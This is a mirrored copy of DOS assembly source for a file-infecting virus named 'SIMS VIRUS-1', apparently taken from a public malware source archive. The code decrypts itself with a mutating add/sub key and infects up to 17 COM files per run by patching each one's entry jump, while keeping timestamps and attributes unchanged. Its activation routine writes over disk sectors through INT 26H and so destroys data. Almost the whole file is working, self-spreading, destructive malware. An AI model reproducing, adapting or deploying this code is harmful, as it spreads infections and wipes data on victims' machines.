mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
226 lines
5.4 KiB
NASM
226 lines
5.4 KiB
NASM
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ް<EFBFBD><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD> ް<><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD> METRiC BUTTLOAD of CODE GENERATOR ް<><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD> Copyright(c) 1994 - MBC - Ver. 0.91b ް<><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD> ް<><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ް<EFBFBD><DEB0>
|
|||
|
|
|||
|
.MODEL TINY
|
|||
|
.CODE
|
|||
|
ORG 100H
|
|||
|
ENTRY_POINT: DB 0E9H,0,0
|
|||
|
|
|||
|
DECRYPT:
|
|||
|
MOV BP,(OFFSET HEAP - OFFSET STARTENCRYPT)/2
|
|||
|
PATCH_STARTENCRYPT:
|
|||
|
MOV bp,OFFSET STARTENCRYPT
|
|||
|
DECRYPT_LOOP:
|
|||
|
DB 81h,46h,0 ; ADD WORD PTR [bp], xxxx
|
|||
|
DECRYPT_VALUE DW 0
|
|||
|
inc bp
|
|||
|
inc bp
|
|||
|
DEC BP
|
|||
|
JNZ DECRYPT_LOOP
|
|||
|
STARTENCRYPT:
|
|||
|
CALL NEXT
|
|||
|
NEXT: POP BP
|
|||
|
SUB BP,OFFSET NEXT
|
|||
|
|
|||
|
LEA SI,[BP+SAVE3]
|
|||
|
MOV DI,100H
|
|||
|
PUSH DI
|
|||
|
MOVSW
|
|||
|
MOVSB
|
|||
|
|
|||
|
MOV BYTE PTR [BP+NUMINFEC],17
|
|||
|
|
|||
|
MOV AH,1AH
|
|||
|
LEA DX,[BP+NEWDTA]
|
|||
|
INT 21H
|
|||
|
|
|||
|
LEA DX,[BP+COM_MASK]
|
|||
|
MOV AH,4EH
|
|||
|
MOV CX,7
|
|||
|
FINDFIRSTNEXT:
|
|||
|
INT 21H
|
|||
|
JC DONE_INFECTIONS
|
|||
|
|
|||
|
MOV AL,0H
|
|||
|
CALL OPEN
|
|||
|
|
|||
|
MOV AH,3FH
|
|||
|
LEA DX,[BP+BUFFER]
|
|||
|
MOV CX,1AH
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV AH,3EH
|
|||
|
INT 21H
|
|||
|
|
|||
|
CHECKCOM:
|
|||
|
MOV AX,WORD PTR [BP+NEWDTA+35]
|
|||
|
CMP AX,'DN'
|
|||
|
JZ FIND_NEXT
|
|||
|
|
|||
|
MOV AX,WORD PTR [BP+NEWDTA+1AH]
|
|||
|
CMP AX,1430
|
|||
|
JB FIND_NEXT
|
|||
|
|
|||
|
CMP AX,65535-(ENDHEAP-DECRYPT)
|
|||
|
JA FIND_NEXT
|
|||
|
|
|||
|
MOV BX,WORD PTR [BP+BUFFER+1]
|
|||
|
ADD BX,HEAP-DECRYPT+3
|
|||
|
CMP AX,BX
|
|||
|
JE FIND_NEXT
|
|||
|
JMP INFECT_COM
|
|||
|
FIND_NEXT:
|
|||
|
MOV AH,4FH
|
|||
|
JMP SHORT FINDFIRSTNEXT
|
|||
|
|
|||
|
DONE_INFECTIONS:
|
|||
|
JMP ACTIVATE
|
|||
|
EXIT_VIRUS:
|
|||
|
MOV AH,1AH
|
|||
|
MOV DX,80H
|
|||
|
INT 21H
|
|||
|
RETN
|
|||
|
SAVE3 DB 0CDH,20H,0
|
|||
|
|
|||
|
ACTIVATE:
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ް<EFBFBD><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD> LITTLE FRISKIES SMOKE 'EM ROUTINE! ް<><DEB0>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ް<EFBFBD><DEB0>
|
|||
|
;
|
|||
|
PROC BLISTER_LIPS
|
|||
|
PUSH DX
|
|||
|
MOV AL,DL
|
|||
|
MOV CX,255
|
|||
|
XOR DX,DX
|
|||
|
INT 26H
|
|||
|
ADD SP,2
|
|||
|
POP DX
|
|||
|
ENDP BLISTER_LIPS
|
|||
|
|
|||
|
JMP EXIT_VIRUS
|
|||
|
|
|||
|
INFECT_COM:
|
|||
|
MOV CX,3
|
|||
|
SUB AX,CX
|
|||
|
LEA SI,[BP+OFFSET BUFFER]
|
|||
|
LEA DI,[BP+OFFSET SAVE3]
|
|||
|
MOVSW
|
|||
|
MOVSB
|
|||
|
MOV BYTE PTR [SI-3],0E9H
|
|||
|
MOV WORD PTR [SI-2],AX
|
|||
|
ADD AX,103H
|
|||
|
PUSH AX
|
|||
|
FINISHINFECTION:
|
|||
|
PUSH CX
|
|||
|
XOR CX,CX
|
|||
|
CALL ATTRIBUTES
|
|||
|
|
|||
|
MOV AL,2
|
|||
|
CALL OPEN
|
|||
|
|
|||
|
MOV AH,40H
|
|||
|
LEA DX,[BP+BUFFER]
|
|||
|
POP CX
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV AX,4202H
|
|||
|
XOR CX,CX
|
|||
|
CWD ; XOR DX,DX
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV AH,2CH
|
|||
|
INT 21H
|
|||
|
MOV [BP+DECRYPT_VALUE],DX
|
|||
|
LEA DI,[BP+CODE_STORE]
|
|||
|
MOV AX,5355H
|
|||
|
STOSW
|
|||
|
LEA SI,[BP+DECRYPT]
|
|||
|
MOV CX,STARTENCRYPT-DECRYPT
|
|||
|
PUSH SI
|
|||
|
PUSH CX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
XOR BYTE PTR [BP+DECRYPT_LOOP+1],028h ; flip between add/sub
|
|||
|
|
|||
|
LEA SI,[BP+WRITE]
|
|||
|
MOV CX,ENDWRITE-WRITE
|
|||
|
REP MOVSB
|
|||
|
POP CX
|
|||
|
POP SI
|
|||
|
POP DX
|
|||
|
PUSH DI
|
|||
|
PUSH SI
|
|||
|
PUSH CX
|
|||
|
REP MOVSB
|
|||
|
MOV AX,5B5DH
|
|||
|
STOSW
|
|||
|
MOV AL,0C3H
|
|||
|
STOSB
|
|||
|
|
|||
|
ADD DX,OFFSET STARTENCRYPT - OFFSET DECRYPT
|
|||
|
MOV WORD PTR [BP+PATCH_STARTENCRYPT+1],DX
|
|||
|
CALL CODE_STORE
|
|||
|
POP CX
|
|||
|
POP DI
|
|||
|
POP SI
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
MOV AX,5701H
|
|||
|
MOV CX,WORD PTR [BP+NEWDTA+16H]
|
|||
|
MOV DX,WORD PTR [BP+NEWDTA+18H]
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV AH,3EH
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV CH,0
|
|||
|
MOV CL,BYTE PTR [BP+NEWDTA+15h]
|
|||
|
CALL ATTRIBUTES
|
|||
|
|
|||
|
DEC BYTE PTR [BP+NUMINFEC]
|
|||
|
JNZ MO_INFECTIONS
|
|||
|
JMP DONE_INFECTIONS
|
|||
|
MO_INFECTIONS: JMP FIND_NEXT
|
|||
|
|
|||
|
OPEN:
|
|||
|
MOV AH,3DH
|
|||
|
LEA DX,[BP+NEWDTA+30]
|
|||
|
INT 21H
|
|||
|
XCHG AX,BX
|
|||
|
RET
|
|||
|
|
|||
|
ATTRIBUTES:
|
|||
|
MOV AX,4301H
|
|||
|
LEA DX,[BP+NEWDTA+30]
|
|||
|
INT 21H
|
|||
|
RET
|
|||
|
|
|||
|
WRITE:
|
|||
|
POP BX
|
|||
|
POP BP
|
|||
|
MOV AH,40H
|
|||
|
LEA DX,[BP+DECRYPT]
|
|||
|
MOV CX,HEAP-DECRYPT
|
|||
|
INT 21H
|
|||
|
PUSH BX
|
|||
|
PUSH BP
|
|||
|
ENDWRITE:
|
|||
|
|
|||
|
COM_MASK DB '*.?OM',0
|
|||
|
MACHINE DB '-=MBC=-',0
|
|||
|
VIRUSNAME DB 'SIMS VIRUS-1',0
|
|||
|
USER DB 'White Shark',0
|
|||
|
|
|||
|
HEAP:
|
|||
|
|
|||
|
CODE_STORE: DB (STARTENCRYPT-DECRYPT)*2+(ENDWRITE-WRITE)+1 DUP (?)
|
|||
|
NEWDTA DB 43 DUP (?)
|
|||
|
NUMINFEC DB ?
|
|||
|
BUFFER DB 1AH DUP (?)
|
|||
|
ENDHEAP:
|
|||
|
END ENTRY_POINT
|